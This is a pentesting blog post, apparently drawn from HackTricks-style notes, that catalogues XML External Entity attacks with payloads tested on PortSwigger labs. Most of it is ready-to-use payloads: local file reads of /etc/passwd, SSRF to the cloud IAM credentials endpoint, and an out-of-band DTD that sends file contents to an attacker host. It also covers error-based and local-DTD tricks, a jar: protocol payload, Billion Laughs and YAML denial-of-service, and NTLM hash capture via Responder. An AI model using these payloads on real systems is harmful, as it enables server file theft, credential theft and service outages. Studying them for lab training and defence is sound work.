<!doctype html> <html lang="en, es"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> XXE - XEE - XML External Entity | 47z!h4Ck </title> <meta name="author" content="47z!Lu7h "> <meta name="description" content="Transmitting a file from your computer to another computer."> <link rel="stylesheet" href="/assets/css/bootstrap.min.css?a4b3f509e79c54a512b890d73235ef04"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/css/mdb.min.css" integrity="sha256-jpjYvU3G3N6nrrBwXJoVEYI/0zw8htfFnhT9ljN3JJw=" crossorigin="anonymous"> <link defer rel="stylesheet" href="/assets/css/academicons.min.css?f0b7046b84e425c55f3463ac249818f5"> <link defer rel="stylesheet" href="/assets/css/scholar-icons.css?62b2ac103a88034e6882a5be5f3e2772"> <link defer rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Roboto+Slab:100,300,400,500,700|Material+Icons&display=swap"> <link defer rel="stylesheet" href="/assets/css/jekyll-pygments-themes-github.css?591dab5a4e56573bf4ef7fd332894c99" media="" id="highlight_theme_light"> <link defer href="/assets/css/bootstrap-toc.min.css?6f5af0bb9aab25d79b2448143cbeaa88" rel="stylesheet"> <link rel="shortcut icon" href="/assets/img/logos/M1n14tz1.png?c5fa12f00bf81b0bfdfb738a6722b18c"> <link rel="stylesheet" href="/assets/css/main.css?d41d8cd98f00b204e9800998ecf8427e"> <link rel="canonical" href="https://47z1lu7h.github.io/blog/2025/xxe-xee-xml-external-entity/"> <script src="/assets/js/theme.js?9a0c749ec5240d9cda97bc72359a72c0"></script> <link defer rel="stylesheet" href="/assets/css/jekyll-pygments-themes-native.css?5847e5ed4a4568527aa6cfab446049ca" media="none" id="highlight_theme_dark"> <script>
    initTheme();
  </script> </head> <body class="fixed-top-nav "> <header> <nav id="navbar" class="navbar navbar-light navbar-expand-sm fixed-top" role="navigation"> <div class="container"> <a class="navbar-brand title font-weight-lighter" href="/"> 47z!h4Ck </a> <button class="navbar-toggler collapsed ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar top-bar"></span> <span class="icon-bar middle-bar"></span> <span class="icon-bar bottom-bar"></span> </button> <div class="collapse navbar-collapse text-right" id="navbarNav"> <ul class="navbar-nav ml-auto flex-nowrap"> <li class="nav-item "> <a class="nav-link" href="/">h0m3 </a> </li> <li class="nav-item "> <a class="nav-link" href="/page/:num/">bl0g </a> </li> <li class="nav-item "> <a class="nav-link" href="/pentesting/">Pentesting </a> </li> <li class="nav-item dropdown "> <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">more </a> <div class="dropdown-menu dropdown-menu-right" aria-labelledby="navbarDropdown"> <div class="dropdown-divider"></div> <a class="dropdown-item " href="/about/">about</a> <div class="dropdown-divider"></div> <div class="dropdown-divider"></div> <div class="dropdown-divider"></div> <a class="dropdown-item " href="/news/">news</a> <div class="dropdown-divider"></div> <div class="dropdown-divider"></div> <div class="dropdown-divider"></div> <a class="dropdown-item " href="/pentesting/">hacking</a> <div class="dropdown-divider"></div> <div class="dropdown-divider"></div> <div class="dropdown-divider"></div> <a class="dropdown-item " href="/categories/">categories</a> <div class="dropdown-divider"></div> </div> </li> <li class="nav-item"> <button id="search-toggle" title="Search" onclick="openSearchModal()"> <span class="nav-link">ctrl k <i class="ti ti-search"></i></span> </button> </li> <li class="toggle-container"> <button id="light-toggle" title="Change theme"> <i class="ti ti-sun-moon" id="light-toggle-system"></i> <i class="ti ti-moon-filled" id="light-toggle-dark"></i> <i class="ti ti-sun-filled" id="light-toggle-light"></i> </button> </li> </ul> </div> </div> </nav> <progress id="progress" value="0"> <div class="progress-container"> <span class="progress-bar"></span> </div> </progress> </header> <div class="container mt-5" role="main"> <div class="row"> <div class="col-sm-3"> <nav id="toc-sidebar" class="sticky-top"></nav> </div> <div class="col-sm-9"> <div class="post"> <header class="post-header"> <h1 class="post-title">XXE - XEE - XML External Entity</h1> <p class="post-meta"> Created in January 01, 2025 </p> <p class="post-tags"> <a href="/blog/2025"> <i class="fa-solid fa-calendar fa-sm"></i> 2025 </a> &nbsp; &middot; &nbsp; <a href="/blog/tag/docs"> <i class="fa-solid fa-hashtag fa-sm"></i> docs</a> &nbsp; &middot; &nbsp; <a href="/blog/category/hacking-pentesting-web"> <i class="fa-solid fa-tag fa-sm"></i> hacking pentesting-web</a> </p> </header> <article class="post-content"> <div id="markdown-content"> <h1 id="xxe---xee---xml-external-entity">XXE - XEE - XML External Entity</h1> <h2 id="xml-basics">XML Basics</h2> <p>XML is a markup language designed for data storage and transport, featuring a flexible structure that allows for the use of descriptively named tags. It differs from HTML by not being limited to a set of predefined tags. XML’s significance has declined with the rise of JSON, despite its initial role in AJAX technology.</p> <ul> <li><strong>Data Representation through Entities</strong>: Entities in XML enable the representation of data, including special characters like <code class="language-plaintext highlighter-rouge">&amp;lt;</code> and <code class="language-plaintext highlighter-rouge">&amp;gt;</code>, which correspond to <code class="language-plaintext highlighter-rouge">&lt;</code> and <code class="language-plaintext highlighter-rouge">&gt;</code> to avoid conflict with XML’s tag system.</li> <li><strong>Defining XML Elements</strong>: XML allows for the definition of element types, outlining how elements should be structured and what content they may contain, ranging from any type of content to specific child elements.</li> <li><strong>Document Type Definition (DTD)</strong>: DTDs are crucial in XML for defining the document’s structure and the types of data it can contain. They can be internal, external, or a combination, guiding how documents are formatted and validated.</li> <li><strong>Custom and External Entities</strong>: XML supports the creation of custom entities within a DTD for flexible data representation. External entities, defined with a URL, raise security concerns, particularly in the context of XML External Entity (XXE) attacks, which exploit the way XML parsers handle external data sources: <code class="language-plaintext highlighter-rouge">&lt;!DOCTYPE foo [ &lt;!ENTITY myentity "value" &gt; ]&gt;</code></li> <li><strong>XXE Detection with Parameter Entities</strong>: For detecting XXE vulnerabilities, especially when conventional methods fail due to parser security measures, XML parameter entities can be utilized. These entities allow for out-of-band detection techniques, such as triggering DNS lookups or HTTP requests to a controlled domain, to confirm the vulnerability. <ul> <li><code class="language-plaintext highlighter-rouge">&lt;!DOCTYPE foo [ &lt;!ENTITY ext SYSTEM "file:///etc/passwd" &gt; ]&gt;</code></li> <li><code class="language-plaintext highlighter-rouge">&lt;!DOCTYPE foo [ &lt;!ENTITY ext SYSTEM "http://attacker.com" &gt; ]&gt;</code></li> </ul> </li> </ul> <h2 id="main-attacks">Main attacks</h2> <p><a href="https://portswigger.net/web-security/xxe"><strong>Most of these attacks were tested using the awesome Portswiggers XEE labs: https://portswigger.net/web-security/xxe</strong></a></p> <h3 id="new-entity-test">New Entity test</h3> <p>In this attack I’m going to test if a simple new ENTITY declaration is working</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE foo [&lt;!ENTITY toreplace "3"&gt;</span> ]&gt;
<span class="nt">&lt;stockCheck&gt;</span>
    <span class="nt">&lt;productId&gt;</span><span class="ni">&amp;toreplace;</span><span class="nt">&lt;/productId&gt;</span>
    <span class="nt">&lt;storeId&gt;</span>1<span class="nt">&lt;/storeId&gt;</span>
<span class="nt">&lt;/stockCheck&gt;</span>
</code></pre></div></div> <p><img src="../images/image (870).png" alt=""/></p> <h3 id="read-file">Read file</h3> <p>Lets try to read <code class="language-plaintext highlighter-rouge">/etc/passwd</code> in different ways. For Windows you could try to read: <code class="language-plaintext highlighter-rouge">C:\windows\system32\drivers\etc\hosts</code></p> <p>In this first case notice that SYSTEM “<em>**file:///**etc/passwd</em>” will also work.</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!--?xml version="1.0" ?--&gt;</span>
<span class="cp">&lt;!DOCTYPE foo [&lt;!ENTITY example SYSTEM "/etc/passwd"&gt;</span> ]&gt;
<span class="nt">&lt;data&gt;</span><span class="ni">&amp;example;</span><span class="nt">&lt;/data&gt;</span>
</code></pre></div></div> <p><img src="../images/image (86).png" alt=""/></p> <p>This second case should be useful to extract a file if the web server is using PHP (Not the case of Portswiggers labs)</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!--?xml version="1.0" ?--&gt;</span>
<span class="cp">&lt;!DOCTYPE replace [&lt;!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"&gt;</span> ]&gt;
<span class="nt">&lt;data&gt;</span><span class="ni">&amp;example;</span><span class="nt">&lt;/data&gt;</span>
</code></pre></div></div> <p>In this third case notice we are declaring the <code class="language-plaintext highlighter-rouge">Element stockCheck</code> as ANY</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE data [
&lt;!ELEMENT stockCheck ANY&gt;</span>
<span class="cp">&lt;!ENTITY file SYSTEM "file:///etc/passwd"&gt;</span>
]&gt;
<span class="nt">&lt;stockCheck&gt;</span>
    <span class="nt">&lt;productId&gt;</span><span class="ni">&amp;file;</span><span class="nt">&lt;/productId&gt;</span>
    <span class="nt">&lt;storeId&gt;</span>1<span class="nt">&lt;/storeId&gt;</span>
<span class="nt">&lt;/stockCheck3&gt;</span>
</code></pre></div></div> <p><img src="../images/image (753).png" alt=""/></p> <h3 id="directory-listing">Directory listing</h3> <p>In <strong>Java</strong> based applications it might be possible to <strong>list the contents of a directory</strong> via XXE with a payload like (just asking for the directory instead of the file):</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!-- Root / --&gt;</span>
<span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE aa[&lt;!ELEMENT bb ANY&gt;&lt;!ENTITY xxe SYSTEM "file:///"&gt;</span>]&gt;<span class="nt">&lt;root&gt;&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;&lt;/root&gt;</span>

<span class="c">&lt;!-- /etc/ --&gt;</span>
<span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE root[&lt;!ENTITY xxe SYSTEM "file:///etc/" &gt;</span>]&gt;<span class="nt">&lt;root&gt;&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;&lt;/root&gt;</span>
</code></pre></div></div> <h3 id="ssrf">SSRF</h3> <p>An XXE could be used to abuse a SSRF inside a cloud</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"&gt;</span> ]&gt;
<span class="nt">&lt;stockCheck&gt;&lt;productId&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/productId&gt;&lt;storeId&gt;</span>1<span class="nt">&lt;/storeId&gt;&lt;/stockCheck&gt;</span>
</code></pre></div></div> <h3 id="blind-ssrf">Blind SSRF</h3> <p>Using the <strong>previously commented technique</strong> you can make the server access a server you control to show it’s vulnerable. But, if that’s not working, maybe is because <strong>XML entities aren’t allowed</strong>, in that case you could try using <strong>XML parameter entities</strong>:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE test [ &lt;!ENTITY % xxe SYSTEM "http://gtd8nhwxylcik0mt2dgvpeapkgq7ew.burpcollaborator.net"&gt;</span> %xxe; ]&gt;
<span class="nt">&lt;stockCheck&gt;&lt;productId&gt;</span>3;<span class="nt">&lt;/productId&gt;&lt;storeId&gt;</span>1<span class="nt">&lt;/storeId&gt;&lt;/stockCheck&gt;</span>
</code></pre></div></div> <h3 id="blind-ssrf---exfiltrate-data-out-of-band">“Blind” SSRF - Exfiltrate data out-of-band</h3> <p><strong>In this occasion we are going to make the server load a new DTD with a malicious payload that will send the content of a file via HTTP request (for multi-line files you could try to ex-filtrate it via _ftp://</strong>_ using this basic server for example <a href="https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb"><strong>xxe-ftp-server.rb</strong></a><strong>). This explanation is based in</strong> <a href="https://portswigger.net/web-security/xxe/blind"><strong>Portswiggers lab here</strong></a><strong>.</strong></p> <p>In the given malicious DTD, a series of steps are conducted to exfiltrate data:</p> <h3 id="malicious-dtd-example">Malicious DTD Example:</h3> <p>The structure is as follows:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!ENTITY % file SYSTEM "file:///etc/hostname"&gt;</span>
<span class="cp">&lt;!ENTITY % eval "&lt;!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'&gt;</span>"&gt;
%eval;
%exfiltrate;
</code></pre></div></div> <p>The steps executed by this DTD include:</p> <ol> <li><strong>Definition of Parameter Entities:</strong> <ul> <li>An XML parameter entity, <code class="language-plaintext highlighter-rouge">%file</code>, is created, reading the content of the <code class="language-plaintext highlighter-rouge">/etc/hostname</code> file.</li> <li>Another XML parameter entity, <code class="language-plaintext highlighter-rouge">%eval</code>, is defined. It dynamically declares a new XML parameter entity, <code class="language-plaintext highlighter-rouge">%exfiltrate</code>. The <code class="language-plaintext highlighter-rouge">%exfiltrate</code> entity is set to make an HTTP request to the attacker’s server, passing the content of the <code class="language-plaintext highlighter-rouge">%file</code> entity within the query string of the URL.</li> </ul> </li> <li><strong>Execution of Entities:</strong> <ul> <li>The <code class="language-plaintext highlighter-rouge">%eval</code> entity is utilized, leading to the execution of the dynamic declaration of the <code class="language-plaintext highlighter-rouge">%exfiltrate</code> entity.</li> <li>The <code class="language-plaintext highlighter-rouge">%exfiltrate</code> entity is then used, triggering an HTTP request to the specified URL with the file’s contents.</li> </ul> </li> </ol> <p>The attacker hosts this malicious DTD on a server under their control, typically at a URL like <code class="language-plaintext highlighter-rouge">http://web-attacker.com/malicious.dtd</code>.</p> <p><strong>XXE Payload:</strong> To exploit a vulnerable application, the attacker sends an XXE payload:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"&gt;</span> %xxe;]&gt;
<span class="nt">&lt;stockCheck&gt;&lt;productId&gt;</span>3;<span class="nt">&lt;/productId&gt;&lt;storeId&gt;</span>1<span class="nt">&lt;/storeId&gt;&lt;/stockCheck&gt;</span>
</code></pre></div></div> <p>This payload defines an XML parameter entity <code class="language-plaintext highlighter-rouge">%xxe</code> and incorporates it within the DTD. When processed by an XML parser, this payload fetches the external DTD from the attacker’s server. The parser then interprets the DTD inline, executing the steps outlined in the malicious DTD and leading to the exfiltration of the <code class="language-plaintext highlighter-rouge">/etc/hostname</code> file to the attacker’s server.</p> <h3 id="error-basedexternal-dtd">Error Based(External DTD)</h3> <p><strong>In this case we are going to make the server loads a malicious DTD that will show the content of a file inside an error message (this is only valid if you can see error messages).</strong> <a href="https://portswigger.net/web-security/xxe/blind"><strong>Example from here.</strong></a></p> <p>An XML parsing error message, revealing the contents of the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file, can be triggered using a malicious external Document Type Definition (DTD). This is accomplished through the following steps:</p> <ol> <li>An XML parameter entity named <code class="language-plaintext highlighter-rouge">file</code> is defined, which contains the contents of the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file.</li> <li>An XML parameter entity named <code class="language-plaintext highlighter-rouge">eval</code> is defined, incorporating a dynamic declaration for another XML parameter entity named <code class="language-plaintext highlighter-rouge">error</code>. This <code class="language-plaintext highlighter-rouge">error</code> entity, when evaluated, attempts to load a nonexistent file, incorporating the contents of the <code class="language-plaintext highlighter-rouge">file</code> entity as its name.</li> <li>The <code class="language-plaintext highlighter-rouge">eval</code> entity is invoked, leading to the dynamic declaration of the <code class="language-plaintext highlighter-rouge">error</code> entity.</li> <li>Invocation of the <code class="language-plaintext highlighter-rouge">error</code> entity results in an attempt to load a nonexistent file, producing an error message that includes the contents of the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file as part of the file name.</li> </ol> <p>The malicious external DTD can be invoked with the following XML:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE foo [&lt;!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"&gt;</span> %xxe;]&gt;
<span class="nt">&lt;stockCheck&gt;&lt;productId&gt;</span>3;<span class="nt">&lt;/productId&gt;&lt;storeId&gt;</span>1<span class="nt">&lt;/storeId&gt;&lt;/stockCheck&gt;</span>
</code></pre></div></div> <p>Upon execution, the web server’s response should include an error message displaying the contents of the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file.</p> <p><img src="../images/image (809).png" alt=""/></p> <p><em><strong>Please notice that external DTD allows us to include one entity inside the second (**</strong><code class="language-plaintext highlighter-rouge">eval</code>*<strong>*), but it is prohibited in the internal DTD. Therefore, you can’t force an error without using an external DTD (usually).</strong></em></p> <h3 id="error-based-system-dtd"><strong>Error Based (system DTD)</strong></h3> <p>So what about blind XXE vulnerabilities when <strong>out-of-band interactions are blocked</strong> (external connections aren’t available)?.</p> <p>A loophole in the XML language specification can <strong>expose sensitive data through error messages when a document’s DTD blends internal and external declarations</strong>. This issue allows for the internal redefinition of entities declared externally, facilitating the execution of error-based XXE attacks. Such attacks exploit the redefinition of an XML parameter entity, originally declared in an external DTD, from within an internal DTD. When out-of-band connections are blocked by the server, attackers must rely on local DTD files to conduct the attack, aiming to induce a parsing error to reveal sensitive information.</p> <p>Consider a scenario where the server’s filesystem contains a DTD file at <code class="language-plaintext highlighter-rouge">/usr/local/app/schema.dtd</code>, defining an entity named <code class="language-plaintext highlighter-rouge">custom_entity</code>. An attacker can induce an XML parsing error revealing the contents of the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file by submitting a hybrid DTD as follows:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE foo [
    &lt;!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"&gt;</span>
    <span class="cp">&lt;!ENTITY % custom_entity '
        &lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;</span>
        <span class="cp">&lt;!ENTITY % eval "&lt;!ENTITY % error SYSTEM 'file:///nonexistent/%file'&gt;</span>"&gt;
        %eval;
        %error;
    '&gt;
    %local_dtd;
]&gt;
</code></pre></div></div> <p>The outlined steps are executed by this DTD:</p> <ul> <li>The definition of an XML parameter entity named <code class="language-plaintext highlighter-rouge">local_dtd</code> includes the external DTD file located on the server’s filesystem.</li> <li>A redefinition occurs for the <code class="language-plaintext highlighter-rouge">custom_entity</code> XML parameter entity, originally defined in the external DTD, to encapsulate an <a href="https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages">error-based XXE exploit</a>. This redefinition is designed to elicit a parsing error, exposing the contents of the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file.</li> <li>By employing the <code class="language-plaintext highlighter-rouge">local_dtd</code> entity, the external DTD is engaged, encompassing the newly defined <code class="language-plaintext highlighter-rouge">custom_entity</code>. This sequence of actions precipitates the emission of the error message aimed for by the exploit.</li> </ul> <p><strong>Real world example:</strong> Systems using the GNOME desktop environment often have a DTD at <code class="language-plaintext highlighter-rouge">/usr/share/yelp/dtd/docbookx.dtd</code> containing an entity called <code class="language-plaintext highlighter-rouge">ISOamso</code></p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE foo [
    &lt;!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"&gt;</span>
    <span class="cp">&lt;!ENTITY % ISOamso '
        &lt;!ENTITY % file SYSTEM "file:///etc/passwd"&gt;</span>
        <span class="cp">&lt;!ENTITY % eval "&lt;!ENTITY % error SYSTEM 'file:///nonexistent/%file;'&gt;</span>"&gt;
        %eval;
        %error;
    '&gt;
    %local_dtd;
]&gt;
<span class="nt">&lt;stockCheck&gt;&lt;productId&gt;</span>3;<span class="nt">&lt;/productId&gt;&lt;storeId&gt;</span>1<span class="nt">&lt;/storeId&gt;&lt;/stockCheck&gt;</span>
</code></pre></div></div> <p><img src="../images/image (625).png" alt=""/></p> <p>As this technique uses an <strong>internal DTD you need to find a valid one first</strong>. You could do this <strong>installing</strong> the same <strong>OS / Software</strong> the server is using and <strong>searching some default DTDs</strong>, or <strong>grabbing a list</strong> of <strong>default DTDs</strong> inside systems and <strong>check</strong> if any of them exists:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE foo [
&lt;!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"&gt;</span>
%local_dtd;
]&gt;
</code></pre></div></div> <p>For more information check <a href="https://portswigger.net/web-security/xxe/blind">https://portswigger.net/web-security/xxe/blind</a></p> <h3 id="finding-dtds-inside-the-system">Finding DTDs inside the system</h3> <p>In the following awesome github repo you can find <strong>paths of DTDs that can be present in the system</strong>:</p> <p>https://github.com/GoSecure/dtd-finder/tree/master/list</p> <p>Moreover, if you have the <strong>Docker image of the victim system</strong>, you can use the tool of the same repo to <strong>scan</strong> the <strong>image</strong> and <strong>find</strong> the path of <strong>DTDs</strong> present inside the system. Read the <a href="https://github.com/GoSecure/dtd-finder">Readme of the github</a> to learn how.</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>java <span class="nt">-jar</span> dtd-finder-1.2-SNAPSHOT-all.jar /tmp/dadocker.tar

Scanning TAR file /tmp/dadocker.tar

 <span class="o">[=]</span> Found a DTD: /tomcat/lib/jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd
Testing 0 entities : <span class="o">[]</span>

 <span class="o">[=]</span> Found a DTD: /tomcat/lib/servlet-api.jar!/jakarta/servlet/resources/XMLSchema.dtd
Testing 0 entities : <span class="o">[]</span>
</code></pre></div></div> <h3 id="xxe-via-office-open-xml-parsers">XXE via Office Open XML Parsers</h3> <p>For a more in depth explanation of this attack, <strong>check the second section of</strong> <a href="https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/"><strong>this amazing post</strong></a> <strong>from Detectify</strong>.</p> <p>The ability to <strong>upload Microsoft Office documents is offered by many web applications</strong>, which then proceed to extract certain details from these documents. For instance, a web application may allow users to import data by uploading an XLSX format spreadsheet. In order for the parser to extract the data from the spreadsheet, it will inevitably need to parse at least one XML file.</p> <p>To test for this vulnerability, it is necessary to create a <strong>Microsoft Office file containing an XXE payload</strong>. The first step is to create an empty directory to which the document can be unzipped.</p> <p>Once the document has been unzipped, the XML file located at <code class="language-plaintext highlighter-rouge">./unzipped/word/document.xml</code> should be opened and edited in a preferred text editor (such as vim). The XML should be modified to include the desired XXE payload, often starting with an HTTP request.</p> <p>The modified XML lines should be inserted between the two root XML objects. It is important to replace the URL with a monitorable URL for requests.</p> <p>Finally, the file can be zipped up to create the malicious poc.docx file. From the previously created “unzipped” directory, the following command should be run:</p> <p>Now, the created file can be uploaded to the potentially vulnerable web application, and one can hope for a request to appear in the Burp Collaborator logs.</p> <h3 id="jar-protocol">Jar: protocol</h3> <p>The <strong>jar</strong> protocol is made accessible exclusively within <strong>Java applications</strong>. It is designed to enable file access within a <strong>PKZIP</strong> archive (e.g., <code class="language-plaintext highlighter-rouge">.zip</code>, <code class="language-plaintext highlighter-rouge">.jar</code>, etc.), catering to both local and remote files.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jar:file:///var/myarchive.zip!/file.txt
jar:https://download.host.com/myarchive.zip!/file.txt
</code></pre></div></div> <blockquote> <p>[!CAUTION] To be able to access files inside PKZIP files is <strong>super useful to abuse XXE via system DTD files.</strong> Check <a href="xxe-xee-xml-external-entity.md#error-based-system-dtd">this section to learn how to abuse system DTD files</a>.</p> </blockquote> <p>The process behind accessing a file within a PKZIP archive via the jar protocol involves several steps:</p> <ol> <li>An HTTP request is made to download the zip archive from a specified location, such as <code class="language-plaintext highlighter-rouge">https://download.website.com/archive.zip</code>.</li> <li>The HTTP response containing the archive is stored temporarily on the system, typically in a location like <code class="language-plaintext highlighter-rouge">/tmp/...</code>.</li> <li>The archive is then extracted to access its contents.</li> <li>The specific file within the archive, <code class="language-plaintext highlighter-rouge">file.zip</code>, is read.</li> <li>After the operation, any temporary files created during this process are deleted.</li> </ol> <p>An interesting technique to interrupt this process at the second step involves keeping the server connection open indefinitely when serving the archive file. Tools available at <a href="https://github.com/GoSecure/xxe-workshop/tree/master/24_write_xxe/solution">this repository</a> can be utilized for this purpose, including a Python server (<code class="language-plaintext highlighter-rouge">slow_http_server.py</code>) and a Java server (<code class="language-plaintext highlighter-rouge">slowserver.jar</code>).</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "jar:http://attacker.com:8080/evil.zip!/evil.dtd"&gt;</span>]&gt;
<span class="nt">&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;</span>
</code></pre></div></div> <blockquote> <p>[!CAUTION] Writing files in a temporary directory can help to <strong>escalate another vulnerability that involves a path traversal</strong> (such as local file include, template injection, XSLT RCE, deserialization, etc).</p> </blockquote> <h3 id="xss">XSS</h3> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;![CDATA[&lt;]]&gt;</span>script<span class="cp">&lt;![CDATA[&gt;]]&gt;</span>alert(1)<span class="cp">&lt;![CDATA[&lt;]]&gt;</span>/script<span class="cp">&lt;![CDATA[&gt;]]&gt;</span>
</code></pre></div></div> <h3 id="dos">DoS</h3> <h4 id="billion-laugh-attack">Billion Laugh Attack</h4> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE data [
&lt;!ENTITY a0 "dos" &gt;</span>
<span class="cp">&lt;!ENTITY a1 "&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;&amp;a0;"&gt;</span>
<span class="cp">&lt;!ENTITY a2 "&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;&amp;a1;"&gt;</span>
<span class="cp">&lt;!ENTITY a3 "&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;&amp;a2;"&gt;</span>
<span class="cp">&lt;!ENTITY a4 "&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;&amp;a3;"&gt;</span>
]&gt;
<span class="nt">&lt;data&gt;</span><span class="ni">&amp;a4;</span><span class="nt">&lt;/data&gt;</span>
</code></pre></div></div> <h4 id="yaml-attack">Yaml Attack</h4> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>a: <span class="err">&amp;</span>a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: <span class="err">&amp;</span>b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: <span class="err">&amp;</span>c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: <span class="err">&amp;</span>d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: <span class="err">&amp;</span>e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: <span class="err">&amp;</span>f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: <span class="err">&amp;</span>g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: <span class="err">&amp;</span>h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: <span class="err">&amp;</span>i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
</code></pre></div></div> <h4 id="quadratic-blowup-attack">Quadratic Blowup Attack</h4> <p><img src="../images/image (527).png" alt=""/></p> <h4 id="getting-ntml">Getting NTML</h4> <p>On Windows hosts it is possible to get the NTML hash of the web server user by setting a responder.py handler:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Responder.py <span class="nt">-I</span> eth0 <span class="nt">-v</span>
</code></pre></div></div> <p>and by sending the following request</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!--?xml version="1.0" ?--&gt;</span>
<span class="cp">&lt;!DOCTYPE foo [&lt;!ENTITY example SYSTEM 'file://///attackerIp//randomDir/random.jpg'&gt;</span> ]&gt;
<span class="nt">&lt;data&gt;</span><span class="ni">&amp;example;</span><span class="nt">&lt;/data&gt;</span>
